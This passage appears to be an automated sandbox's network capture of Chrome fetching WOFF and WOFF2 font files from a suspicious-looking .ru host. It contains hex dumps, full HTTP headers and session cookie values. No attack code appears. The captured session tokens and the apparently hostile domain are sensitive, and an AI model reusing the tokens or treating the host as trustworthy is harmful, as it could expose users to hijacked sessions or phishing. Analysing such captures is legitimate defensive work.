                                                2024-05-30 10:21:10 UTC1369INData Raw: 75 76 05 d9 74 b9 b0 24 95 be 39 e2 c8 e7 ed 03 c0 64 f5 67 15 d4 4b a0 1c 83 ae 60 ec ae 01 51 24 52 a8 17 ec d7 e5 02 86 d6 f7 93 a3 02 4c fd 08 2e 8c 51 67 00 58 f0 b7 dd 29 00 ab bc b1 63 95 3a c0 e5 1b 8e 84 eb 18 37 bb ef 5b d7 78 fc 7d eb 19 6f bf 0f 7d 63 b3 00 00 20 24 28 4c 1c 20 c3 ee 31 20 a1 ae 01 e7 67 65 60 3c ab 00 96 58 09 ac 4a bb 44 03 43 dd 38 d9 f3 a2 2b cd a5 b3 5c 2d 6b ac c0 93 b0 6f fd 3a 04 fd 22 2e c2 be 55 37 a0 58 93 20 c4 cf 40 e9 fe 01 ff a3 bf 02 54 df f1 8b 37 d2 18 b9 b2 03 8d 66 21 96 60 25 57 88 a6 3f f3 e8 ee 9c 1a f8 ec 5f 95 a3 57 af 34 dc c0 f6 14 72 54 dc 81 7e 73 3e 7a 37 c6 fa dd 84 b2 82 b7 a0 7a 70 7b fd bf 42 d0 4f eb 28 a4 30 55 01 23 24 61 8a 97 2a 35 0e da f7 f4 cd 10 22 2c 42 aa 28 31 81 9a 39 89 24 32 0a
                                                Data Ascii: uvt$9dgK`Q$RL.QgX)c:7[x}o}c $(L 1 ge`<XJDC8+\-ko:".U7X @T7f!`%W?_W4rT~s>z7zp{BO(0U#$a*5",B(19$2
                                                2024-05-30 10:21:10 UTC1369INData Raw: a6 97 af d5 63 8f 3c f1 dc 33 af 7c b3 6d 8b 0c 04 3f 40 60 4f 3c e0 20 be 10 e4 01 3d a8 7d a6 28 9b 38 a1 c5 64 57 74 3d ec 7f 7d 08 26 bd 16 95 ea 5b 16 b0 5d d2 de b5 6e b9 e3 ae 7b 6e 6b 72 28 f0 1d 1b 15 eb 74 db 4d 9d ae bb 2f 4e a5 f6 c0 61 4c 1d c7 6e b4 0c 4d bd 43 5d 9c ee 65 37 b8 ea ff 8d 8b ca 96 bb eb 56 d5 5a 4d 90 d4 e4 b5 76 87 e4 8d 45 7d 9a 48 7b 15 e0 5a c2 73 b4 ee 2e be 04 f8 b4 7e c7 da 3d f4 f5 ed 7a 5a 3f ac 25 b2 36 32 5a f6 5f c0 4a 1d ff a4 c9 f4 bf f6 4f f8 3a c0 5c 92 fa 51 9c be bf bc 3e 88 6f 28 0a 9c e4 45 91 5e ff 83 f9 e0 35 e2 f6 53 a6 99 64 a7 9e 68 3c 39 c1 74 f8 af 2d f4 6b e8 e9 d0 0e 42 8c e0 02 a8 36 9f 40 50 6b 72 08 44 df 89 c3 a0 23 f1 be 82 8f 9f a6 6c c8 ea e2 70 81 d8 e7 08 a7 65 e7 73 8e 16 c3 78 1e d8 5f
                                                Data Ascii: c<3|m?@`O< =}(8dWt=}&[]n{nkr(tM/NaLnMC]e7VZMvE}H{Zs.~=zZ?%62Z_JO:\Q>o(E^5Sdh<9t-kB6@PkrD#lpesx_
                                                2024-05-30 10:21:10 UTC1369INData Raw: 90 f0 e5 1c 78 f6 57 88 bf cd 85 bf 53 bf e2 c7 1c f6 cf 7b e2 5f aa f0 6f 0a fc 99 a3 fe 7b 4f fc 4f 15 fe 4f f1 7a c1 4f 5d c3 5e e8 fa 49 b7 d0 0e 70 d3 ad 1f fb c9 d3 33 05 10 1c 9c 8f f4 d8 f9 ab 65 5f 2e 9e fa 31 5c 0f 80 47 2e 03 e8 af 1b ab 78 90 19 8c 5c 3d 16 50 9e 10 aa b7 bb f1 96 e9 e8 50 5a 57 99 89 cb 42 8c 4f a5 c6 83 b0 72 71 d2 e9 5c 2c 8d e9 08 ac 4c 5d e9 e1 2a 2c 52 ba 08 9f 4a 8e 07 a1 28 86 32 a7 dd c8 b8 a8 8b 07 a7 74 ba 73 43 a8 e0 ea ca f2 67 58 b7 fe e2 8b 5d 0d dd c5 61 5a 55 59 9a 0f cd a5 7c b3 55 ed 6b 08 d9 3e 2e e8 14 eb a1 c6 2d 23 31 06 d3 5c 07 73 91 a5 48 f6 10 c2 65 09 59 44 d5 32 9e c2 c0 67 88 49 29 63 f6 60 86 66 ae f7 aa d0 58 94 7c 06 f4 ab 58 8e d0 72 36 8b 19 fb d1 96 1d 44 50 d7 90 6d 47 b6 20 cc 83 76 4d b5
                                                Data Ascii: xWS{_o{OOOzO]^Ip3e_.1\G.x\=PPZWBOrq\,L]*,RJ(2tsCgX]aZUY|Uk>.-#1\sHeYD2gI)c`fX|Xr6DPmG vM
                                                2024-05-30 10:21:10 UTC1369INData Raw: d4 12 4a 2e ad 61 00 bd a8 65 12 04 2e 4d eb 35 d1 e1 80 1c 69 5d bf cc a1 e8 ac ef 3b f9 0a 24 ed 13 15 ac 4d 28 6d ea 7c 96 81 ad 6b 76 cb f2 ea 9a 98 e8 b3 84 7a ce d7 ad d3 1a f7 5d b8 96 7f e0 ef fb 3e d2 ff 10 71 be 45 2d 8d b5 93 2a 9f 2a fe 87 98 cc f7 1a 0f e6 a6 af f9 2b 26 34 d7 d6 39 10 09 be 2e 9e f0 d4 8e 33 b4 8b 19 e5 a9 9d 73 66 58 9e dc dc f7 04 ae e0 53 fd d4 74 7f cd 9a 76 7c 53 74 7a b8 41 07 9a 43 e8 66 29 ea 9d 9e 9c 9f 60 5e dc a2 67 a2 89 2e 8a 3d 6a 11 03 df b2 c3 35 2d db bf 54 8e 2c e8 63 02 b6 b6 82 1f 1e 48 3c 04 3a 4d 54 d0 ba 1b 7f cf 00 55 2a 7c 3c 7a f7 c0 a9 d4 3c 3a e4 66 3e 91 cb 46 cd d4 3b 3d 5e 7c 75 77 09 fc 80 de 6b 83 b1 31 20 03 f7 52 5b 17 79 79 fc fa e3 c7 fe 67 66 0b 87 1e ce e4 67 4f 5f 86 a5 da ce f5 c1 0b
                                                Data Ascii: J.ae.M5i];$M(m|kvz]>qE-**+&49.3sfXStv|StzACf)`^g.=j5-T,cH<:MTU*|<z<:f>F;=^|uwk1 R[yygfgO_
                                                2024-05-30 10:21:10 UTC1369INData Raw: 1d 2b 89 f3 77 22 e2 12 dc 03 f9 3b 07 e6 8f 03 0a 13 5b 7c 11 96 dd 39 50 c7 5c e8 b6 f3 ef e1 f8 f4 af 76 d7 04 6c a5 5b 5e a5 1f 82 e5 c8 48 75 02 05 a3 99 05 4b 0b cf 39 99 9b 44 e9 29 d2 4f e0 4d 76 5e eb d9 c9 2a 51 3c d3 98 aa 7e 11 1f 98 ae d2 2b d3 a4 f9 9a 0c b7 3d 84 70 b2 dd be ff 15 fd d3 ca ed c7 5a e4 3b 4f 4d 7e fe de f7 38 7c 59 78 f5 45 72 48 c9 b4 a5 47 d1 4f d6 15 62 27 b3 8b 70 d3 fa a2 3e a2 bc 65 ae 08 dd f4 4c 26 b8 0e bb 11 81 6e 8c ee b3 4e 29 73 93 b2 4d 47 db 14 36 f3 fd ef 69 4c 75 77 3d d1 4d 84 97 19 e8 a7 6b fe ff f9 e1 fa fd 4c a2 2c c7 1e 8d a7 96 3f 2a d7 8f 3f 1f 03 bf fd da ba fb e8 7b 75 c5 a3 0a fe 9a ef 16 b0 ec ef b4 ce b9 94 ed 47 9b 64 db 4f 4d ac 65 d4 fc 88 ba 28 3c ff 22 39 a2 6a b1 ac 41 de 47 d1 17 e3 ce e4
                                                Data Ascii: +w";[|9P\vl[^HuK9D)OMv^*Q<~+=pZ;OM~8|YxErHGOb'p>eL&nN)sMG6iLuw=MkL,?*?{uGdOMe(<"9jAG


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                33192.168.2.449781188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:10 UTC1378OUTGET /yzSSueW3Rlb568gKDHxKxop43 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://f8gxf.oritelos.ru
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: font
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:10 UTC617INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:10 GMT
                                                Content-Type: font/woff
                                                Content-Length: 35970
                                                Connection: close
                                                Content-Disposition: inline; filename="yzSSueW3Rlb568gKDHxKxop43"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jEmqiXKpc5SFdgjUeMBQRV65WEEgmRy6q64q5YK33zu%2BDk9WJONnXXx4VNURfwjpC%2BirmaSgUrg248gVWxil9IrmylEv1pR8TWvXoUVQVZvS6b9ECtegL8KUEmjwxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfeea9f517d18-EWR
                                                2024-05-30 10:21:10 UTC752INData Raw: 77 4f 46 46 00 01 00 00 00 00 8c 82 00 11 00 00 00 01 24 20 00 01 00 00 00 00 8b 5c 00 00 01 26 00 00 02 93 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8b 54 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 17 df 00 00 4e b6 ed 42 8f b9 47 53 55 42 00 00 19 60 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c 10 00 00 00 46 00 00 00 60 69 c3 7b 5b 63 6d 61 70 00 00 1c 58 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 84 dc 00 00 00 2f 00 00 00 3c 29 81 01 c0 66 70 67 6d 00 00 85 0c 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 84 d4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 21 74 00 00 52 61 00 00 9d a4 24 e0 b2 69 68 65 61 64 00 00 73 d8 00 00 00 33 00 00 00 36 1b 16 7d b8 68 68 65 61 00 00 74 0c 00 00 00
                                                Data Ascii: wOFF$ \&DSIGTGPOSNBGSUB`3yOS/2F`i{[cmapX<?+cvt /<)fpgm?gaspglyf!tRa$iheads36}hheat
                                                2024-05-30 10:21:10 UTC1369INData Raw: b4 8b f6 d2 01 fa 90 4a e8 10 1d a6 06 6a e2 04 f6 b2 8f bb 71 26 5f c6 d7 f2 60 be 81 87 f0 50 be 91 87 f1 4d 3c 9c 6f e6 5b f8 56 1e c1 b7 f1 48 1e cb 53 78 3a cf e0 99 3c 8b 67 f3 1c 9e cb f3 78 3e 2f e0 85 bc 88 17 f3 12 5e ca cb 78 39 af e0 95 bc 8a 57 73 2e e7 f1 26 de ca 85 bc 93 8b 78 0f 17 13 f3 6a 55 4a a9 94 ae 42 d4 53 9d a7 1c 32 28 5f b5 d0 01 55 c7 d3 d5 51 9e a1 82 3c 87 e2 79 ae 6a e6 79 d8 e7 ab f3 bc 50 85 78 b1 3a c5 cb d0 b6 02 6d 2b b1 af 56 d5 fc 8a aa e5 35 68 5b 8b 7e 45 b8 57 4c dd e8 72 70 c0 07 1e f8 30 ea 19 2a 50 75 18 f9 24 4f 41 af e9 94 86 d1 b7 f1 4c 4a e1 59 e4 e5 d9 e4 e1 39 18 65 ae da 02 4c b5 c0 14 02 a6 20 2f 22 3f b0 6d e1 a5 94 08 8c 8d bc 1c bf 2b f0 cc 4a ec ab c8 00 e6 a3 9c ab 1a f8 15 ea 2a d8 f3 54 21 6f c2
                                                Data Ascii: Jjq&_`PM<o[VHSx:<gx>/^x9Ws.&xjUJBS2(_UQ<yjyPx:m+V5h[~EWLrp0*Pu$OALJY9eL /"?m+J*T!o
                                                2024-05-30 10:21:10 UTC1369INData Raw: f4 39 ff 11 7a a1 e7 db 00 aa 6a 1d 19 56 5a 57 86 48 dc 00 97 0c cb df 06 44 32 47 d0 be cf d6 47 e1 40 dc f0 9f e8 bc ef e6 e4 11 eb e1 13 bf 8f ec f1 0c fa c6 ab 90 aa 27 03 73 ec a2 5a 00 90 2e ee 04 71 d6 a8 af e9 82 6f 6a bb 7a 16 de dd 07 09 27 ab 4f 54 b9 aa 55 cd aa 5a fd 45 2d 01 d5 75 ea b0 3a a3 3e a3 38 d5 a4 ce 83 de 7c d0 df 97 52 70 75 94 92 c0 9f d8 51 f9 02 a8 d4 bf 0d 42 5d 85 3a 41 99 ea 04 a8 1d 40 1e 50 59 8d a6 7b cc dc 9e fc 2d 41 9c 5d 4e 7e e1 ae 81 59 7d 09 c9 c5 66 eb 02 ac d5 ea 24 f2 9c 78 a1 06 76 01 ed 20 75 4a f3 4a 73 10 96 d3 c5 99 53 50 7e d2 e5 2c 1e 67 be 18 f1 f2 a0 3a 07 1a 6b d4 11 70 26 01 60 40 f6 04 e9 96 a1 d1 83 3c d3 03 30 a4 9e 21 58 2e b9 e8 f5 4a d5 14 1b 2a b7 a9 57 21 b7 4c 00 a9 f7 14 b2 63 f0 af 00 c7
                                                Data Ascii: 9zjVZWHD2GG@'sZ.qojz'OTUZE-u:>8|RpuQB]:A@PY{-A]N~Y}f$xv uJJsSP~,g:kp&`@<0!X.J*W!Lc
                                                2024-05-30 10:21:10 UTC1369INData Raw: 27 f5 1a 9c 39 86 da a5 f6 aa 77 20 cb 62 68 0f 34 06 da 9b 6d cb 57 8e 1f aa b3 6a 87 ab 1a 2d 95 b7 c3 cd ea 20 ec e4 20 e4 58 62 d2 a1 73 2d f1 c6 01 8c ad b5 af 0c 39 56 10 ed a5 c0 9e 8a b3 24 f8 b3 0c f5 67 3c dd 1c d1 67 f8 61 5f 6f 80 8a a5 f0 7d 7e b1 da 06 f4 6d c1 dd 15 e4 87 9e 7f a2 df d2 6b 3f 0a 7c 59 82 eb 55 1a 8e e3 93 ba 16 47 b5 11 ef f0 ef 6d 8b 2b d5 ea 7e 3c b9 4e 7f c7 25 1e 2d e8 5a 17 09 60 fe 86 9a a4 72 25 2f e8 02 2b db 4d 37 e8 55 27 f5 38 65 ab 0f 1d 9a da 48 4c 4b 16 fe e6 a4 da 6f 71 df a0 ae 62 b9 65 ed bf c4 41 e5 d1 d0 46 b6 ae f5 10 75 5c 1d 06 cf fc a6 15 68 2a ac 9c da bd 26 1f f6 56 49 be c2 33 cf f4 db d8 52 bd 9e a6 69 8f 20 71 d3 03 9d 50 07 1c 1f 60 98 39 7c c4 bc 3e 14 3d d2 60 a6 15 ad 96 20 b3 6f a5 d2 1c f3
                                                Data Ascii: '9w bh4mWj- Xbs-9V$g<ga_o}~mk?|YUGm+~<N%-Z`r%/+M7U'8eHLKoqbeAFu\h*&VI3Ri qP`9|>=` o
                                                2024-05-30 10:21:10 UTC1369INData Raw: 90 33 d7 58 35 64 95 ce b7 a1 21 51 be 30 47 2d b2 0e b5 9e 1d 15 6d 0b c8 96 da fa a0 ca c3 08 65 c8 4a c2 22 b7 ca 90 fe 55 ad b1 5d 3d d7 69 66 d6 59 bb ac 92 9b df 5d b4 59 47 5b a0 d6 a0 36 4b 32 2b 43 f5 17 b3 12 b6 f2 f1 06 e4 bd 46 ab 26 29 ed db 72 c8 f9 8e 27 7c d5 c0 f4 66 7f a5 04 5d b9 a5 ae 07 5d 54 ee 76 a8 3c aa ab 4e c9 d2 8a a4 2a d8 25 df fe 6b 5b 14 2a 5b 9a db fb 4b 97 75 75 4a 65 c4 dc dd 6b 7f c9 2f b5 48 99 53 57 d5 44 fb 7b 1c d4 1d 75 f0 0b a9 e2 ef b2 91 c5 37 80 af c9 ad ef 99 d5 fd 12 21 b2 25 f3 31 35 2c 45 de c5 d4 c9 93 a6 8e a5 09 bf 33 44 e7 bc f2 05 6a 36 20 00 d0 35 76 26 ee 24 8a a7 e9 2f f4 18 f0 41 b5 c0 14 14 2d 0d e8 15 76 e9 d5 5a d5 d6 45 58 cb 6c b1 fc 66 8b 95 ed 35 c3 fb b5 56 22 f1 ae 1c b8 d6 92 7b a4 fa 52
                                                Data Ascii: 3X5d!Q0G-meJ"U]=ifY]YG[6K2+CF&)r'|f]]Tv<N*%k[*[KuuJek/HSWD{u7!%15,E3Dj6 5v&$/A-vZEXlf5V"{R
                                                2024-05-30 10:21:10 UTC1369INData Raw: f8 4e be 87 02 3c 86 c7 51 26 a2 09 ec 14 f1 e4 e7 d4 83 a7 f0 14 1a c8 53 79 2a f5 e6 a7 f8 29 4a e2 5f f0 2f 70 fe 34 3f 8d f3 5f f2 7f a2 cf 34 9e 46 5d f9 57 fc 2b 4a e3 67 f8 19 9c ff 9a 7f 8d f3 e9 3c 9d ae e1 19 3c 83 46 f1 4c 9e 49 f7 f0 2c 9e 45 63 78 36 cf a6 2b 79 0e cf a1 7e 88 59 cf 92 0f 51 eb 79 1c e7 f2 5c 1a cd f3 78 1e 0d e0 f9 3c 9f 46 f0 0b fc 5f d4 8d 17 f0 02 1a cc 0b 79 21 dd c0 8b 78 11 dd c6 8b 79 31 8d 44 a4 5b 42 b7 f0 52 5e 4a b7 f2 4b fc 12 8d 47 c4 5b 46 fd 79 39 2f a7 6b 79 05 af a0 eb 78 25 af a4 eb 11 07 57 d1 55 bc 9a 57 eb ff 3b c4 b9 74 35 ff 96 5f a6 cb 10 19 5f a1 3b 78 0d af a1 9b 74 84 a4 e1 3a 42 d2 5d 88 90 9b e8 76 44 c9 cd 74 b3 8e 93 94 a1 63 23 28 dc c1 3b 70 dc c9 3b 69 18 a2 64 11 0d 42 9c dc 43 37 22 56 16
                                                Data Ascii: N<Q&Sy*)J_/p4?_4F]W+Jg<<FLI,Ecx6+y~YQy\x<F_y!xy1D[BR^JKG[Fy9/kyx%WUW;t5__;xt:B]vDtc#(;p;idBC7"V
                                                2024-05-30 10:21:10 UTC1369INData Raw: 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73 fc ab fc cb fc 63 fd f1 fe f8 a3 95 4a 9e aa 38 27 ec 40 58 be 75 35 c5 8a 4c 9b 39 e5 af cd 65 0b 47 f9 98 13 7c ad 34 70 06 da 4c 76 52 9c f9 65 db 65 ab 93 e6 2c 71 32 9d 2c 67 8d 93 e3 6c 74 f2 9c 5d ce 1e 27 df 29 70 0e db de 61 e7 b8 f3 31 e7 1d 4e de 3f ea 6c 27 e7 cf 22 c4 ba f4 ae 36 6a b1 f6 e8 4d ad 52 8a 66 6b 9e 36 e9 39 4d d2 34 8d 53 82 86 6a 87 b6 6a a7 66 6a be 5e d5 58 bd a6 17 35 45 dd f5 ba c6 eb 0d 4d d4 0c 2d 51 86 d2 94 ae 09 ca d4 7d 5a a0 85 4a d4 7e a5 aa 9f b2 b4 59 3d d8 a7 95 4a 52 9c 16 69 8c 66 11 4d 1b da 9a 6b ae 31 f7 b8 74 e1 56 6e
                                                Data Ascii: /X:Q+T"#Pc~2c?uIscJ8'@Xu5L9eG|4pLvRee,q2,glt]')pa1N?l'"6jMRfk69M4Sjjfj^X5EM-Q}ZJ~Y=JRifMk1tVn
                                                2024-05-30 10:21:10 UTC1369INData Raw: 31 c7 11 da 60 1f 5c 11 1e e6 af 33 1a c2 62 c2 63 42 82 74 a1 fe a1 29 51 1a e8 94 ce 90 11 c1 e8 fd 55 ea 80 00 bd bf 37 63 34 e0 8c 2c 4b 66 9c d1 a8 95 de 18 b4 e7 f1 5f 17 9e 58 61 2b 29 ef 5e 51 bc fe dc 90 fd 36 83 e6 2f 1c 5a 74 1b c7 77 0f ae e9 11 3e e5 77 66 b6 ed ae 69 bf 2f 33 fd cc 8a 96 23 83 05 6c 79 fd bc 92 4e e1 a4 fd d1 ae ae a6 7e 61 39 a5 77 d3 e8 6d 7e 35 7f 04 19 50 ba 2d 25 32 c2 db 0b 46 11 97 21 86 c1 cd 80 5e 40 39 c1 b9 99 03 fa 04 a2 0a 8c c2 42 fc 7c 3d dc 90 01 1b 78 b5 7f 12 1f 1d 17 c7 58 32 fd b2 62 cc 19 5c a0 3a 2e ce 18 ed 0d 38 47 30 e6 8c 2c 6b a0 8a 63 b9 87 47 ce 75 b5 9f c5 e8 e8 9f 71 7a dd 97 c9 2f 3f da fe f8 e2 bc fc c1 63 6d f7 5f ce f9 a2 56 b8 ee df f1 32 f6 7e fe 04 f6 7d ad e7 c6 8f 17 6c dc 35 75 dd f9
                                                Data Ascii: 1`\3bcBt)QU7c4,Kf_Xa+)^Q6/Ztw>wfi/3#lyN~a9wm~5P-%2F!^@9B|=xX2b\:.8G0,kcGuqz/?cm_V2~}l5u
                                                2024-05-30 10:21:10 UTC1369INData Raw: 96 bb ef f8 1e 3c 28 7c 24 bc f6 92 80 47 fa cf 6c 9c 21 68 97 ad 5d b7 f4 2f ec 5f 77 ff 34 c9 7e 80 a9 b7 bf c0 ef cc ed 7b 44 f8 b2 bd ae ae 4d 78 98 cc b3 e4 d1 db 5c 3a d0 38 89 e8 df b0 50 15 cf 61 16 24 07 cb 32 cd 40 e4 00 51 7c 28 fa 37 2a 22 38 d0 d3 1d 25 e1 24 5e 11 20 11 ac 99 62 10 13 67 c9 2c 04 e9 1a 20 0a 5b 15 a1 23 19 7d 66 da c0 4b 7b 9a 7c 47 dc 32 2b ba b2 57 ae 78 7f 14 bd 3f 75 e5 33 ed 4f 7e 91 fd 45 74 5f 75 75 ef fb c2 fb b3 b6 bc e4 9f 37 70 64 81 6d 5a 47 51 64 73 49 7f cf c0 b9 4b 73 0f f4 e4 1c 7f b8 70 76 55 fd f4 fe ee be 33 17 9a 1e 1e 28 00 7c fd 81 76 bb a9 1d 15 6a 0b 22 04 a2 3a d8 9b e8 04 51 be d2 09 88 41 be 13 6d 85 df 15 66 70 2b 84 19 02 f7 e4 67 9f dd 6d 83 fa 0f 41 7f df 85 fa c1 28 c6 66 00 ca 63 ca bc 0e 5d
                                                Data Ascii: <(|$Gl!h]/_w4~{DMx\:8Pa$2@Q|(7*"8%$^ bg, [#}fK{|G2+Wx?u3O~Et_uu7pdmZGQdsIKspvU3(|vj":QAmfp+gmA(fc]
                                                2024-05-30 10:21:10 UTC1369INData Raw: 85 d2 70 9a c3 c8 aa a2 8d 93 28 3e 95 5a 45 fe 3b 50 6b d7 92 2d d1 31 ee 01 1e f7 fd 6c 1b 51 87 4b ea eb 87 6c 21 42 79 43 c0 d4 a8 cc 34 85 6a 30 de 96 9e 0c 5c fd 20 68 c8 d6 71 1a f2 85 27 6e 36 04 64 45 65 36 a5 c8 54 24 fc da 02 f3 0d a4 20 f2 45 91 28 cb 66 06 9e 52 63 06 ac 77 62 1a 49 f2 56 e3 10 c0 f0 d3 12 cb 30 24 48 1b e9 17 a9 05 db d3 8d 58 e0 8e 3e b8 d6 68 31 63 c5 0f 27 83 fe d3 f1 be f8 92 25 63 de 38 ee 13 1e 72 f4 c8 99 c5 97 ec 3f 12 bd 72 61 f7 25 61 c3 ff 0f f0 03 ed c7 df 47 7d c1 40 82 9f 1b f0 21 08 78 ce 1d bc 51 90 65 2a de 5d 25 79 a5 6a 4c f5 55 60 80 de 5f e7 27 69 2b ad af a7 3a 1c 3c 18 bd c1 62 d6 9b f5 46 d1 45 25 28 ea 40 6b 5e 22 ae ea e0 20 71 56 e1 2f d3 6f 7f 90 df f9 e9 a7 9f 1e bd 7b 87 f8 ac 9c ea a8 f0 c8 75
                                                Data Ascii: p(>ZE;Pk-1lQKl!ByC4j0\ hq'n6dEe6T$ E(fRcwbIV0$HX>h1c'%c8r?ra%aG}@!xQe*]%yjLU`_'i+:<bFE%(@k^" qV/o{u


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                34192.168.2.449779188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:10 UTC1376OUTGET /78cJa7D3fK45ClNib8mst60 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://f8gxf.oritelos.ru
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: font
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:10 UTC616INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:10 GMT
                                                Content-Type: font/woff2
                                                Content-Length: 28584
                                                Connection: close
                                                Content-Disposition: inline; filename="78cJa7D3fK45ClNib8mst60"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4m454fF5vjjsVlxepu9hvg8pK7PXhvrcd6fuooqsXFU5qswIgrGengBVXZz%2F5xgxyFnPyyC2YOHFhG3t%2Fki87rGvTV9Qd042aoq0Yql3pHGBhoBrrxHsAPTq2BFpfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfeea9ae6421c-EWR
